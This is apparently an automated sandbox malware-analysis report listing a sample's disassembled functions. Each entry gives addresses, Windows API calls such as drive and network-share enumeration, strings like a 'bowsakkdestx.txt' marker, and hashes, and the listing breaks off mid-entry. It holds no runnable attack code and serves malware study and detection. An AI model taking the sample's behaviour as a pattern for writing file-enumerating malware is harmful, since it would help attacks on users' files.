                                                                                                                                                    • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                                                                    • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                                                                                    • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                                                                    • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004C5D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __getptd_noexit.LIBCMT ref: 004C5D3D
                                                                                                                                                      • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                                                                                                                                                      • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                                                                                                                                      • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                                                                                                                                      • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                                                                                                                                      • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 004C5D60
                                                                                                                                                    • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                                                                                                                                    • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                                                                                                                                    Strings
                                                                                                                                                    • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                                                                    • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                                                    • API String ID: 3123740607-798102604
                                                                                                                                                    • Opcode ID: 5eaddf98615f3ccf4cac01015d8d3972c4a1175607e626bbf50d5c61fd2a7b38
                                                                                                                                                    • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                                                                                                                                    • Opcode Fuzzy Hash: 5eaddf98615f3ccf4cac01015d8d3972c4a1175607e626bbf50d5c61fd2a7b38
                                                                                                                                                    • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _fprintf_memset
                                                                                                                                                    • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                                                                    • API String ID: 3021507156-3399676524
                                                                                                                                                    • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                                                                    • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                                                                                    • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                                                                    • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$AppendFolder
                                                                                                                                                    • String ID: bowsakkdestx.txt
                                                                                                                                                    • API String ID: 29327785-2616962270
                                                                                                                                                    • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                                                                    • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                                                                                    • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                                                                    • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                                                                                    • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CreateShowUpdate
                                                                                                                                                    • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                                                    • API String ID: 2944774295-3503800400
                                                                                                                                                    • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                                                                    • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                                                                                                                                    • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                                                                    • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                                                                                                                                    • _memset.LIBCMT ref: 00410C4C
                                                                                                                                                    • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 364255426-0
                                                                                                                                                    • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                                                                    • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                                                                                    • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                                                                    • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2560635915-0
                                                                                                                                                    • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                                                                                    • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                                                                                    • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                                                                                    • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 0043B70B
                                                                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00680000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                                    • _free.LIBCMT ref: 0043B71E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap_free_malloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1020059152-0
                                                                                                                                                    • Opcode ID: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
                                                                                                                                                    • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                                                                                    • Opcode Fuzzy Hash: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
                                                                                                                                                    • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0041F0B6
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                                                                                                                                                    • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1380987712-0
                                                                                                                                                    • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                                                                    • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                                                                                    • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                                                                    • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0041E546
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                                                                                                                                                    • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1380987712-0
                                                                                                                                                    • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                                                                    • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                                                                                    • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                                                                    • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0041FA7B
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1380987712-0
                                                                                                                                                    • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                    • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                                                                                                                                    • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                    • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0041FE2B
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1380987712-0
                                                                                                                                                    • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                    • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                                                                                                                                    • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                    • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                    • API String ID: 4104443479-4289949731
                                                                                                                                                    • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                                                                    • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                                                                                                                                    • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                                                                    • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                    • API String ID: 4104443479-4289949731
                                                                                                                                                    • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                                                                    • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                                                                                    • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                                                                    • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00425341 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsnlen
                                                                                                                                                    • String ID: U
                                                                                                                                                    • API String ID: 3628947076-3372436214
                                                                                                                                                    • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                                    • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                                                                                    • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                                    • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                                                                                    • API String ID: 2102423945-2013712220
                                                                                                                                                    • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                                                                    • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                                                                                    • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                                                                    • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
